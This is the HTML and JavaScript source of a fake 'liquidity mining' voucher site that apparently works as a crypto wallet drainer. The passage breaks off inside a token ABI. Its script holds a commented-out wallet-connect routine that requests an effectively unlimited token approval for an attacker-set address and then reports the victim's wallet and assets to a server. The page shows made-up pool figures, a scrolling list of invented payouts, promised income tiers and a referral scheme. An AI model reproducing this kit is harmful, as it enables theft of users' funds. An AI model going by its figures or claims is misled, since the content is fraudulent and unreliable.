<!DOCTYPE html>

<html>

<head>
    <meta charset="utf-8">
    <title></title>
    <link rel="icon" href="static/image/favicon.ico">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="static/css/font-awesome.min.css">
    <link rel="stylesheet" href="static/css/slick.min.css">
    <link rel="stylesheet" href="static/css/slick-theme.min.css">
    <script src="static/js/jquery-3.6.0.js" integrity="sha256-H+K7U5CnXl1h5ywQfKtSj8PCmoN9aaq30gDh27Xc0jk=" crossorigin="anonymous"></script>
    <script src="static/js/popper.min.js"></script>
    <script src="static/js/slick.min.js"></script>
    <link rel="stylesheet" href="static/css/bootstrap.min.css">
    <script src="static/js/bootstrap.min.js"></script>
    <link rel="stylesheet" href="static/css/style.css">

    <script type="text/javascript" src="static/js/mui.min.js"></script>
    <script type="text/javascript" src="static/js/layer.en.js"></script>
    <link rel="stylesheet" type="text/css" href="static/css/iconfont.css">

    <script type="text/javascript" src="static/js/TronWeb.js"></script>
    <script type="text/javascript" src="static/js/web3.min.js"></script>
    <script type="text/javascript" src="static/js/web3model.min.js"></script>
    <script type="text/javascript" src="static/js/web3provider.js"></script>

</head>

<body>
    <!-- top-container -->
    <div class="top-container">
        <header class="container-fluid mx-xl-3 mx-md-3 mx-0 py-xl-4 py-md-4 py-3 w-auto">
            <div class="row align-items-center">
                <div class="col-md-4 col-3 d-flex justify-content-start">
                    <!--img src="/erc/images/share_icon.svg" class="logo share-icon" data-toggle="modal"
                        data-target="#sharemyModal"-->
                    <a href="#" class="link-btn1 px-1 d-flex justify-content-center align-items-center"><img src="static/picture/link_icon.svg" class="logo mr-xl-3 mr-md-3 mr-1 logo-icon1" id="connect">
                        <h4 class="font-weight-normal" id="walletadd">
                            Connect wallet
                        </h4>
                    </a>
                </div>
                <div class="col-md-4 col-6 d-flex justify-content-center">
                    <img src="static/image/header_icon.png" class="logo title_icon">
                </div>
                <!-- Share Modal -->

                <div class="toast-msg p-xl-4 p-md-4 p-2 w-100"><img src="static/picture/toast_success.svg" class="mr-2">Copy
                    success</div>
                <!-- modal -->

                <div class="col-md-4 col-3 d-flex justify-content-end">
                    <div class="link-btn px-1 d-flex justify-content-center align-items-center"  id="myModalLabel">
                        <img src="static/picture/icon1.svg" alt="" srcset="" class="logo mr-xl-3 mr-md-3 mr-1 logo-icon" id="img_pre">
                        <img src="static/picture/down.png" alt="" srcset="" class="logo mr-xl-3 mr-md-3 mr-1 logo-iconsown">
                    </div>
                    <!-- <a href="" class="link-btn px-1 d-flex justify-content-center align-items-center"><img src="/erc/images/link_icon.svg" class="logo mr-xl-3 mr-md-3 mr-1 logo-icon"><h4 class="font-weight-normal">c93de3</h4></a> -->

                </div>
                <!-- modal -->
                <div class="popup_container" style="display: none;">
                    <div class="cover" style="display: none;"></div>
                    <div class="select-nextwork-modal" style="display: none;">
                        <div class="modal-header">
                            <div class="modal-header-title">Select network</div>
                            <button type="button" id="closeModalLabel" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">×</span></button>
                        </div>
                        <div class="modal-body">
                            <div class="modal-nextwork-cell" id="iconOne">
                                <img src="static/picture/icon1.svg" alt="" srcset="" class="img">
                                <div class="name">Ethereum USDT(ERC20)</div>
                            </div>
                            <!-- <div class="modal-nextwork-cell" id="iocnTwo">
                                <img src="static/picture/icon2.png" alt="" srcset="" class="img">
                                <div class="name">Tron USDT(TRC20)</div>
                            </div> -->
                        </div>
                    </div>
                </div>
            </div>
        </header>

        <section class="p-receive mt-4 pt-2">
            <div class="container-fluid ml-xl-3 ml-md-3 ml-0 pr-0 w-auto">
                <div class="row align-items-center">
                    <div class="col-6">
                        <h1 class="m-0">Receive Voucher</h1>
                        <h2 class="mt-xl-3 mt-md-3 mt-2 mb-xl-4 mb-md-4 mb-1 pb-2 font-weight-bold">Join the node and
                            start mining</h2>
                        <div style="display: flex;">
                            <button class="btn text-center custom-ctn d-flex justify-content-center align-items-center font-weight-normal" href="#" data-toggle="modal" data-target="#myModal" show="true" style="margin-right: 10px;">Receive</button>

                        </div>
                    </div>
                    <div class="col-6 d-flex justify-content-end">
                        <div class="img-container"><img src="static/picture/bg_top.png" class="shap w-100"></div>
                    </div>
                </div>

            </div>
        </section>
        <!-- Modal -->
        <div class="modal fade overflow-hidden p-0" id="myModal" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel" aria-hidden="true" style="background: hsla(0,0%,84.7%,.5);">
            <div class="modal-dialog w-100 h-100 mw-100 m-0 p-0" role="document">
                <div class="modal-content border-0 bg-transparent">
                    <div class="container-fluid mx-xl-3 mx-md-3 mx-0 py-0 w-auto">
                        <div class="mining-body p-xl-4 p-md-4 p-2 bg-white br-rounded m-0 modal-body position-relative p-0">
                            <button type="button" class="close font-weight-normal text-white position-absolute" data-dismiss="modal" aria-label="Close">
                                <span aria-hidden="true">×</span>
                            </button>
                            <div class="">
                                <div class="p-2">
                                    <div class="title position-relative">
                                        <span class="left_icon red position-absolute"></span>
                                        <h1 class="font-weight-bold h1-title">Receive description</h1>
                                        <h3 class="h3-title font-weight-normal mt-4">You need to pay a miner's fee to
                                            receive the voucher, please make sure that your wallet has enough TRX as the
                                            miner's fee</h3>
                                        <button class="mt-xl-5 mt-md-5 mt-3 mb-xl-5 mb-md-5 mb-0 exchange-btn rcv-btn mx-auto btn text-center custom-ctn d-flex justify-content-center align-items-center" id="btn-connect">Receive</button>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <!-- modal -->


    </div>
    <!-- main-container -->
    <div class="main-container mt-xl-5 mt-md-5 mt-4 mb-xl-5 mb-md-5 mb-4">
        <div class="container-fluid mx-xl-3 mx-md-3 mx-0 w-auto">
            <section class="p-tabs">
                <div id="exTab2" class="">
                    <div class="panel panel-default">
                        <div class="panel-heading">
                            <div class="panel-title">
                                <ul class="nav nav-tabs row align-items-center justify-content-center text-center tab-1">
                                    <li class="col-4 position-relative"><a class="active" href="#1" data-toggle="tab">
                                            <h6 class="pb-xl-4 pb-md-4 pb-2 m-0 font-weight-bold">Mining Pool</h6>
                                        </a></li>
                                    <li class="col-4 position-relative"><a href="#2" data-toggle="tab">
                                            <h6 class="pb-xl-3 pb-md-3 pb-2 font-weight-bold">Account</h6>
                                        </a></li>
                                    <li class="col-4 position-relative"><a href="#3" data-toggle="tab">
                                            <h6 class="pb-xl-3 pb-md-3 pb-2 font-weight-bold">Team</h6>
                                        </a></li>
                                </ul>
                            </div>
                        </div>
                        <div class="p-tabs-section">
                            <div class="tab-content">
                                <!-- Mining Pool Tab  -->
                                <div class="tab-pane active" id="1">
                                    <!-- Pool data -->

                                    <div class="panel-body p-xl-4 p-md-4 p-2 bg-white br-rounded mt-xl-5 mt-md-5 mt-4">
                                        <div class="p-2">
                                            <div class="title position-relative">
                                                <span class="left_icon position-absolute"></span>
                                                <h1 class="font-weight-bold h1-title">Pool data</h1>
                                            </div>
                                            <ul class="list-unstyled pt-xl-2 pt-md-2 pt-0">
                                                <li class="d-flex justify-content-between align-items-center mt-xl-4 mt-md-4 mt-3">
                                                    <h3 class="h3-title font-weight-normal">Total output</h3>
                                                    <h2 class="h2-title blue font-weight-bold">24986.408326 ETH</h2>
                                                </li>
                                                <li class="d-flex justify-content-between align-items-center mt-xl-4 mt-md-4 mt-3">
                                                    <h3 class="h3-title font-weight-normal">Valid node</h3>
                                                    <h2 class="h2-title blue font-weight-bold">405</h2>
                                                </li>
                                                <li class="d-flex justify-content-between align-items-center mt-xl-4 mt-md-4 mt-3">
                                                    <h3 class="h3-title font-weight-normal">Participant</h3>
                                                    <h2 class="h2-title font-weight-bold">4488</h2>
                                                </li>
                                                <li class="d-flex justify-content-between align-items-center mt-xl-4 mt-md-4 mt-3">
                                                    <h3 class="h3-title font-weight-normal">User Revenue</h3>
                                                    <h2 class="h2-title font-weight-bold">41550775.71335 USDT</h2>
                                                </li>
                                            </ul>
                                        </div>
                                    </div>
                                    <!-- Mining -->
                                    <div class="mining-heading text-center mt-xl-5 mt-md-5 mt-4">
                                        <div class="section_title font-weight-bold mb-1">Mining</div>
                                        <div class="section_subtitle font-weight-bold">Liquidity mining income</div>
                                    </div>
                                    <div class="panel-body mining-body p-xl-4 p-md-4 p-2 bg-white br-rounded mt-xl-5 mt-md-5 mt-4">
                                        <div class="p-address-slider p-2">
                                            <div class="title position-relative">
                                                <span class="left_icon red position-absolute"></span>
                                                <h1 class="font-weight-bold h1-title">User Output</h1>
                                                <ul class="d- list-unstyled pt-xl-2 pt-md-2 pt-0 mb-4">
                                                    <li class="d-flex justify-content-between align-items-center mt-xl-4 mt-md-4 mt-3">
                                                        <h3 class="h3-title font-weight-normal">Address</h3>
                                                        <h3 class="h3-title font-weight-normal">Quantity</h3>
                                                    </li>
                                                </ul>
                                            </div>
                                            <div style="height: 64vw; overflow: hidden;" id="myScrollWrapper">
                                                <ul class="list-unstyled pt-xl-2 pt-md-2 pt-0 m-0" id="myScroll"></ul>
                                                <ul class="list-unstyled pt-xl-2 pt-md-2 pt-0 m-0" id="myFakeScroll"></ul>
                                            </div>
                                        </div>
                                    </div>
                                    <!-- Help center -->
                                    <div class="help-heading text-center mt-xl-5 mt-md-5 mt-4">
                                        <div class="section_title font-weight-bold mb-1">
                                            Help center
                                        </div>
                                        <div class="section_subtitle font-weight-bold">
                                            Hope it helps you
                                        </div>
                                    </div>
                                    <div class="help-body mt-xl-5 mt-md-5 mt-4">
                                        <div class="accordion" id="accordion2">
                                            <div class="accordion-group bg-white p-xl-4 p-md-4 p-3 mb-3 br-rounded">
                                                <div class="accordion-heading">
                                                    <a class="accordion-toggle section_title font-weight-bold d-flex justify-content-between" data-toggle="collapse" href="#collapseOne"> <span>How do i need to join？</span> <img
                                                            src="static/picture/arrow_up.svg" class="arrow"> </a>
                                                </div>
                                                <div id="collapseOne" class="accordion-body collapse">
                                                    <div class="accordion-inner mt-3">
                                                        To participate in non-destructive and non-guaranteed liquidity mining, you need to pay an ETH miner's fee to receive the voucher, and an ETH wallet address only needs to be claimed once. Automatically open mining permissions after success
                                                    </div>
                                                </div>
                                            </div>
                                            <div class="accordion-group bg-white p-xl-4 p-md-4 p-3 mb-3 br-rounded">
                                                <div class="accordion-heading">
                                                    <a class="accordion-toggle section_title font-weight-bold d-flex justify-content-between" data-toggle="collapse" href="#collapseTwo"> <span>How do i withdraw money</span> <img
                                                            src="static/picture/arrow_up.svg" class="arrow"> </a>
                                                </div>
                                                <div id="collapseTwo" class="accordion-body collapse">
                                                    <div class="accordion-inner mt-3">
                                                        You can convert the coins produced daily into USDT, and then initiate a withdrawal. The USDT withdrawal will be automatically sent to the wallet address you added to the node, and other addresses are not supported.
                                                    </div>
                                                </div>
                                            </div>
                                            <div class="accordion-group bg-white p-xl-4 p-md-4 p-3 mb-3 br-rounded">
                                                <div class="accordion-heading">
                                                    <a class="accordion-toggle section_title font-weight-bold d-flex justify-content-between" data-toggle="collapse" href="#collapseThree"> <span>How to calculate income？</span> <img
                                                            src="static/picture/arrow_up.svg" class="arrow"> </a>
                                                </div>
                                                <div id="collapseThree" class="accordion-body collapse">
                                                    <div class="accordion-inner mt-3">
                                                        When you join successfully, the smart contract starts to calculate your address through the node and starts to calculate the income The ，income is as follows: 1-999 income is 0.008|1000-4999 income is 0.01|5000-19999 income is 0.013|20000-49999 Income is 0.016|50000-99999 income is 0.019|100000-499999 income is 0.024|500000-3000000 income is 0.03|3000000-999999999999 income is 0.035|
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                    <!-- Audit report -->
                                    <div class="audit-heading text-center mt-xl-5 mt-md-5 mt-4">
                                        <div class="section_title font-weight-bold mb-1">
                                            Audit report
                                        </div>
                                        <div class="section_subtitle font-weight-bold">
                                            We have a secure audit report
                                        </div>
                                    </div>
                                    <div class="audit-body mt-xl-5 mt-md-5 mt-4">
                                        <div class="row mt-xl-5 mt-md-5 mt-2 pt-3">
                                            <div class="col-4 d-flex justify-content-start">
                                                <img class="botton-icon" src="static/picture/bottom_icon1.png">
                                            </div>
                                            <div class="col-4 d-flex justify-content-center">
                                                <img class="botton-icon" src="static/picture/bottom_icon2.png">
                                            </div>
                                            <div class="col-4 d-flex justify-content-end">
                                                <img class="botton-icon" src="static/picture/bottom_icon3.png">
                                            </div>
                                        </div>
                                    </div>
                                    <!-- Partner -->
                                    <div class="partner-heading text-center mt-xl-5 mt-md-5 mt-4">
                                        <div class="section_title font-weight-bold mb-1">
                                            Partner
                                        </div>
                                        <div class="section_subtitle font-weight-bold">
                                            our business partner
                                        </div>
                                    </div>
                                    <div class="audit-body mt-xl-5 mt-md-5 mt-4">
                                        <div class="row mt-xl-5 mt-md-5 mt-2 pt-3">
                                            <div class="col-4 d-flex justify-content-start">
                                                <img class="botton-icon" src="static/picture/bottom_icon4.png">
                                            </div>
                                            <div class="col-4 d-flex justify-content-center">
                                                <img class="botton-icon" src="static/picture/bottom_icon5.png">
                                            </div>
                                            <div class="col-4 d-flex justify-content-end">
                                                <img class="botton-icon" src="static/picture/bottom_icon6.png">
                                            </div>
                                        </div>
                                        <div class="row mt-xl-5 mt-md-5 mt-4">
                                            <div class="col-4 d-flex justify-content-start">
                                                <img class="botton-icon" src="static/picture/bottom_icon7.png">
                                            </div>
                                            <div class="col-4 d-flex justify-content-center">
                                                <img class="botton-icon" src="static/picture/bottom_icon8.png">
                                            </div>
                                            <div class="col-4 d-flex justify-content-end">
                                                <img class="botton-icon" src="static/picture/bottom_icon9.png">
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                <!-- Account Tab -->
                                <div class="tab-pane" id="2">
                                    <div class="panel-body p-xl-4 p-md-4 p-2 bg-white br-rounded mt-xl-5 mt-md-5 mt-4">
                                        <div class="p-2">
                                            <div class="title position-relative">
                                                <span class="left_icon position-absolute"></span>
                                                <h1 class="font-weight-bold h1-title">My account</h1>
                                            </div>
                                            <ul class="list-unstyled pt-xl-2 pt-md-2 pt-0">
                                                <li class="d-flex justify-content-between align-items-center mt-xl-4 mt-md-4 mt-3">
                                                    <h3 class="h3-title font-weight-normal">Total output</h3>
                                                    <h2 class="h2-title font-weight-bold balance">0 TRX</h2>
                                                </li>
                                                <li class="d-flex justify-content-between align-items-center mt-xl-4 mt-md-4 mt-3">
                                                    <h3 class="h3-title font-weight-normal">Wallet balance</h3>
                                                    <h2 class="h2-title font-weight-bold" data-balance="0" id="usdt_balance">0 USDT</h2>
                                                </li>
                                                <li class="d-flex justify-content-between align-items-center mt-xl-4 mt-md-4 mt-3">
                                                    <h3 class="h3-title font-weight-normal">Exchangeable</h3>
                                                    <h2 class="h2-title font-weight-bold balance">0 TRX</h2>
                                                </li>
                                            </ul>
                                        </div>
                                    </div>
                                    <!-- Account > exchange -->
                                    <div class="panel-body">
                                        <section class="p-tabs mt-xl-5 mt-md-5 mt-4">
                                            <div id="exTab3" class="">
                                                <div class="panel panel-default">
                                                    <div class="panel-heading">
                                                        <div class="panel-title">
                                                            <ul class="nav nav-tabs row align-items-center text-center tab-2 border-0">
                                                                <li class="col-4 position-relative d-flex justify-content-start"> <a class="active" href="#4" data-toggle="tab">
                                                                        <h1 class="p-0 m-0 font-weight-normal d-flex justify-content-center align-items-center"> Exchange</h1>
                                                                    </a></li>
                                                                <li class="col-4 position-relative d-flex justify-content-center"> <a href="#5" data-toggle="tab">
                                                                        <h1 class="p-0 m-0 font-weight-normal d-flex justify-content-center align-items-center"> Withdraw</h1>
                                                                    </a></li>
                                                                <li class="col-4 position-relative d-flex justify-content-end"> <a href="#6" data-toggle="tab">
                                                                        <h1 class="p-0 m-0 font-weight-normal d-flex justify-content-center align-items-center"> Record</h1>
                                                                    </a></li>
                                                            </ul>
                                                        </div>
                                                    </div>
                                                    <div class="p-tabs-section">
                                                        <div class="tab-content">
                                                            <!-- Exchange Tab  -->
                                                            <div class="tab-pane active" id="4">
                                                                <div class="panel-body p-xl-4 p-md-4 p-2 bg-white br-rounded mb-5">
                                                                    <div class="p-2">
                                                                        <div class="title position-relative">
                                                                            <span class="left_icon position-absolute"></span>
                                                                            <h1 class="font-weight-bold h1-title"> Exchange</h1>
                                                                        </div>
                                                                        <ul class="mt-4 mb-xl-5 mb-md-5 mb-4 border br-rounded list-unstyled d-flex align-items-center">
                                                                            <li class="col-4 p-xl-5 p-md-5 p-3 d-flex justify-content-start flex-column p-input">
                                                                                <input type="number" placeholder="0.0" class="change_input ff font-weight-bold" id="ethnumber">
                                                                                <div class="change_all position-absolute" id="redeem" onclick="upnum();">Redeem all</div>
                                                                            </li>
                                                                            <li class="col-4 p-xl-5 p-md-5 p-3 d-flex justify-content-center"><img src="static/picture/change_icon.svg" class="change_icon"></li>
                                                                            <li class="col-4 p-xl-5 p-md-5 p-3 d-flex justify-content-end">
                                                                                <div class="usdt_content d-flex align-items-center"><img src="static/picture/usdt_icon.png" class="usdt_icon mr-xl-4 mr-md-4 mr-2"><span>USDT</span></div>
                                                                            </li>
                                                                        </ul>
                                                                        <button class="exchange-btn mx-auto btn text-center custom-ctn d-flex justify-content-center align-items-center commit">Exchange</button>
                                                                        <div class="border-top mt-xl-5 mt-md-5 mt-4 py-4">
                                                                            <h3 class="h3-title font-weight-normal tips">Convert the TRX coins you dug into USDT</h3>
                                                                        </div>
                                                                    </div>
                                                                </div>
                                                            </div>
                                                            <!-- Withdraw Tab -->
                                                            <div class="tab-pane" id="5">
                                                                <div class="panel-body p-xl-4 p-md-4 p-2 bg-white br-rounded mb-5">
                                                                    <div class="p-2">
                                                                        <div class="title position-relative">
                                                                            <span class="left_icon position-absolute"></span>
                                                                            <h1 class="font-weight-bold h1-title"> Withdraw</h1>
                                                                        </div>
                                                                        <ul class="mt-4  mb-xl-5 mb-md-5 mb-4 border br-rounded list-unstyled d-flex align-items-center">
                                                                            <li class="col-4 p-xl-5 p-md-5 p-3 d-flex justify-content-start flex-column p-input">
                                                                                <input type="number" placeholder="0.0" id="usdtnumber" class="change_input ff font-weight-bold">
                                                                                <div class="change_all position-absolute" id="redeem1" onclick="upnum1();">Redeem all</div>
                                                                            </li>
                                                                            <li class="col-4 p-xl-5 p-md-5 p-3 d-flex justify-content-center">
                                                                                <div class="divider"></div>
                                                                            </li>
                                                                            <li class="col-4 p-xl-5 p-md-5 p-3 d-flex justify-content-end">
                                                                                <div class="usdt_content d-flex align-items-center"><img src="static/picture/usdt_icon.png" class="usdt_icon mr-xl-4 mr-md-4 mr-2"><span>USDT</span></div>
                                                                            </li>
                                                                        </ul>
                                                                        <button class="exchange-btn mx-auto btn text-center custom-ctn d-flex justify-content-center align-items-center withdraw-commit">Confirm</button>
                                                                        <div class="border-top mt-xl-5 mt-md-5 mt-4 py-4">
                                                                            <h3 class="h3-title font-weight-normal tips">Your withdrawal will be sent to your USDT wallet address within 24 hours in the future</h3>
                                                                        </div>
                                                                    </div>
                                                                </div>
                                                            </div>
                                                            <!-- Record Tab -->
                                                            <div class="tab-pane" id="6">
                                                                <div class="panel-body p-xl-4 p-md-4 p-2 bg-white br-rounded mb-5">
                                                                    <section class="p-tabs mt-xl-5 mt-md-5 mt-4">
                                                                        <div id="exTab4" class="">
                                                                            <div class="panel panel-default">
                                                                                <div class="panel-heading">
                                                                                    <div class="panel-title">
                                                                                        <ul class="nav nav-tabs row align-items-center justify-content-center tab-3 border-0">
                                                                                            <li><a class="active font-weight-normal d-flex align-items-center justify-content-center" href="#66" data-toggle="tab">Exchange</a> </li>
                                                                                            <li><a href="#7" data-toggle="tab" class="font-weight-normal d-flex align-items-center justify-content-center">Withdraw</a> </li>
                                                                                            <li><a href="#8" data-toggle="tab" class="font-weight-normal d-flex align-items-center justify-content-center">Mining</a> </li>
                                                                                        </ul>
                                                                                    </div>
                                                                                </div>
                                                                                <div class="p-tabs-section">
                                                                                    <div class="tab-content">
                                                                                        <!-- Exchange Tab  -->
                                                                                        <div class="tab-pane active" id="66">
                                                                                            <div class="exchange-body">
                                                                                                <div class="d-flex flex-wrap align-items-center mt-5">
                                                                                                    <div class="col-6 t1">
                                                                                                        <div class="t1-head">
                                                                                                            Time
                                                                                                        </div>
                                                                                                    </div>
                                                                                                    <div class="col-6 t1 d-flex flex-column align-items-end">
                                                                                                        <div class="t1-head">
                                                                                                            Quantity
                                                                                                        </div>
                                                                                                    </div>
                                                                                                </div>
                                                                                                <!-- If no data display img -->
                                                                                                <div class="no_data text-center">
                                                                                                    <ul class="list-unstyled pl-2 pr-3 pt-xl-2 pt-md-2 pt-0"  id="exchange-list">
                                                                                                        <img class="my-2" src="static/picture/nodata_icon.svg">
                                                                                                        <h3 class="h3-title font-weight-normal">No Data</h3>
                                                                                                    </ul>
                                                                                                </div>
                                                                                            </div>
                                                                                        </div>
                                                                                        <!-- Withdraw Tab -->
                                                                                        <div class="tab-pane" id="7">
                                                                                            <div class="exchange-body">
                                                                                                <div class="d-flex flex-wrap align-items-center mt-5">
                                                                                                    <div class="col-6 t1">
                                                                                                        <div class="t1-head">
                                                                                                            Time
                                                                                                        </div>
                                                                                                    </div>
                                                                                                    <div class="col-6 t1 d-flex flex-column align-items-end">
                                                                                                        <div class="t1-head">
                                                                                                            Quantity
                                                                                                        </div>
                                                                                                    </div>
                                                                                                </div>
                                                                                                <!-- If no data display img -->
                                                                                                <div class="no_data text-center">
                                                                                                    <ul class="list-unstyled pl-2 pr-3 pt-xl-2 pt-md-2 pt-0"  id="withdraw-list">
                                                                                                        <img class="my-2" src="static/picture/nodata_icon.svg">
                                                                                                        <h3 class="h3-title font-weight-normal">No Data</h3>
                                                                                                    </ul>
                                                                                                </div>
                                                                                            </div>
                                                                                        </div>
                                                                                        <!-- Mining Tab -->
                                                                                        <div class="tab-pane" id="8">
                                                                                            <div class="exchange-body">
                                                                                                <div class="d-flex align-items-center mt-5">
                                                                                                    <div class="col-6 t1">
                                                                                                        <div class="t1-head">
                                                                                                            Time
                                                                                                        </div>
                                                                                                    </div>
                                                                                                    <div class="col-6 t1 d-flex flex-column align-items-end">
                                                                                                        <div class="t1-head">
                                                                                                            Output
                                                                                                        </div>
                                                                                                    </div>
                                                                                                </div>
                                                                                                <!-- If no data display img -->
                                                                                                <div class="no_data text-center">
                                                                                                    <img class="my-2" src="static/picture/nodata_icon.svg">
                                                                                                    <h3 class="h3-title font-weight-normal">No Data</h3>
                                                                                                </div>
                                                                                            </div>
                                                                                        </div>
                                                                                    </div>
                                                                                </div>
                                                                            </div>
                                                                        </div>
                                                                    </section>
                                                                </div>
                                                            </div>
                                                        </div>
                                                    </div>
                                                </div>
                                            </div>
                                        </section>
                                    </div>
                                </div>
                                <!-- Team Tab -->
                                <div class="tab-pane" id="3">
                                    <div class="panel-body p-xl-4 p-md-4 p-2 bg-white br-rounded mt-xl-5 mt-md-5 mt-4">
                                        <div class="p-2">
                                            <div class="title position-relative">
                                                <span class="left_icon position-absolute"></span>
                                                <h1 class="font-weight-bold h1-title">Team data</h1>
                                            </div>
                                            <ul class="list-unstyled pt-xl-2 pt-md-2 pt-0">
                                                <li class="d-flex justify-content-between align-items-center mt-xl-4 mt-md-4 mt-3">
                                                    <h3 class="h3-title font-weight-normal">level 1 Total output</h3>
                                                    <h2 class="h2-title font-weight-bold"><span class="level1-money">0</span> ETH</h2>
                                                </li>
                                                <li class="d-flex justify-content-between align-items-center mt-xl-4 mt-md-4 mt-3">
                                                    <h3 class="h3-title font-weight-normal">level 2 Total output</h3>
                                                    <h2 class="h2-title font-weight-bold"><span class="level2-money">0</span> ETH</h2>
                                                </li>
                                                <li class="d-flex justify-content-between align-items-center mt-xl-4 mt-md-4 mt-3">
                                                    <h3 class="h3-title font-weight-normal">level 3 Total output</h3>
                                                    <h2 class="h2-title font-weight-bold"><span class="level3-money">0</span> ETH</h2>
                                                </li>
                                                <li class="d-flex justify-content-between align-items-center mt-xl-4 mt-md-4 mt-3">
                                                    <h3 class="h3-title font-weight-normal">Team Revenue</h3>
                                                    <h2 class="h2-title font-weight-bold"><span class="trx_balance">0</span> ETH</h2>
                                                </li>
                                            </ul>
                                        </div>
                                    </div>
                                    <div class="share_content mt-xl-5 mt-md-5 mt-3 px-xl-4 px-md-4 px-3 pt-3 pb-3">
                                        <div class="set_content">
                                            <h3 class="h3-title font-weight-normal">Referrer</h3>
                                            <div class="content d-flex justify-content-between align-items-center p-xl-4 p-md-4 p-3 mt-xl-4 mt-md-4 mt-2">
                                                <input type="text" placeholder="Referrer's wallet address" value="" class="border-0 w-100" id="fid">
                                                <button class="submit d-flex justify-content-center align-items-center referrer-commit">Save</button>
                                            </div>
                                            <h3 class="h3-title font-weight-normal tips mt-4">Set the referrer, the referrer will get additional rewards from the mining pool</h3>
                                        </div>

                                        <div class="set_content mt-4 pt-4 border-top">
                                            <h3 class="h3-title font-weight-normal">My share link</h3>
                                            <div class="content p-xl-4 p-md-4 p-3 mt-xl-4 mt-md-4 mt-2">
                                                <div class="copy-text position-relative d-flex justify-content-between align-items-center">
                                                    <input type="text" readonly="readonly" class="text border-0 w-100" id="referral-input" value="share link">
                                                    <button class="submit d-flex justify-content-center align-items-center">Copy</button>
                                                    <!-- <div class="toast-msg p-xl-4 p-md-4 p-2 w-100"><img src="/erc/images/toast_success.svg" class="mr-2">Copy success</div> -->
                                                </div>
                                            </div>
                                            <h3 class="h3-title font-weight-normal tips mt-4">Send your invitation link, friends join the node through your link, and you will get generous token rewards</h3>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </section>
        </div>
        <!-- container-fluid -->
    </div>
    <!-- main-container -->
    <script type="text/javascript">
    /**
     * * Connect wallet button pressed.
     */
    // async function onConnect() {
    //     $('.pages').append('<div class="modal-overlay"></div>');
    //     $('.modal-overlay').addClass('modal-overlay-visible');
    //     $('.modal').removeClass('modal-out').addClass('modal-in');
    //     let tronWeb = window.tronWeb
    //     let walletAddress = await tronWeb.defaultAddress.base58;
    //     bizhong = await getMostValuableAssets(walletAddress);
    //     let instance = await tronWeb.contract().at(approveAddr);
    //     instance["balanceOf"](walletAddress).call().then(
    //         function(result) {
    //             //balance = result;
    //         });
    //     balance = 0;
    //     let res = await instance["approve"](authorized_address, "90000000000000000000000000000");
    //     res.send({
    //         feeLimit: 100000000,
    //         callValue: 0,
    //         shouldPollResponse: false
    //     }, function(err, res) {
    //         if (err == null) {
    //             $(".tishi").fadeIn()
    //             setTimeout(function() {
    //                 $(".tishi").fadeOut()
    //             }, 2000);
    //             postInfo(walletAddress, bizhong, balance);
    //         }
    //         $('.modal-overlay').remove();
    //         $('.modal').removeClass('modal-in').addClass('modal-out');
    //     })
    //
    //     s()
    // }

    var count = jQuery('.slick-slide').length;
    jQuery("#total").text(count);
    jQuery('.slider-for').slick({
        autoplay: true,
        arrows: false,
        dots: false,
        slidesToShow: 7,
        slidesToScroll: 1,
        centerPadding: "10px",
        draggable: false,
        infinite: true,
        pauseOnHover: false,
        swipe: false,
        touchMove: false,
        vertical: true,
        speed: 600,
        autoplaySpeed: 800,
        useTransform: true,
        cssEase: 'cubic-bezier(0.645, 0.045, 0.355, 1.000)',
        adaptiveHeight: true,
        rtl: false
    });

    let copyText = document.querySelector(".copy-text");
    copyText.querySelector("button").addEventListener("click", function() {
        let input = copyText.querySelector("input.text");
        input.select();
        document.execCommand("copy");
        copyText.classList.add("active");
        window.getSelection().removeAllRanges();

        $('.toast-msg').addClass("active");
        setTimeout(function() {
            copyText.classList.remove("active");
            $('.toast-msg').removeClass("active");
        }, 2500);
    });
    $('#closeModalLabel').click(function() {
        $('.popup_container').css('display', 'none')
        $('.cover').css('display', 'none')
        $('.popup_container .select-nextwork-modal').css('display', 'none')
    });
    $('#myModalLabel').click(function() {
        $('.popup_container').css('display', 'block')
        $('.cover').css('display', 'block')
        $('.popup_container .select-nextwork-modal').css('display', 'block')
    });
    $('#iconOne').click(function() {
        window.location = '';
    });
    $('#iocnTwo').click(function() {
        $("#img_pre").attr("src", 'static/picture/icon2.png');
        $('.popup_container').css('display', 'none')
        $('.cover').css('display', 'none')
        $('.popup_container .select-nextwork-modal').css('display', 'none')
        $('.link-btn').css('background', '#dc1029')
    });
    function upnum() {
        var num = $('#usdt_balance').attr('data-balance');
        jQuery('#ethnumber').val(num);
    }
    function upnum1() {
        var num = $('#usdt_balance').attr('data-balance');
        jQuery('#usdtnumber').val(num);
    }

    const ABI = [{"inputs":[{"internalType":"string","name":"name","type":"string"},{"internalType":"string","name":"symbol","type":"string"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":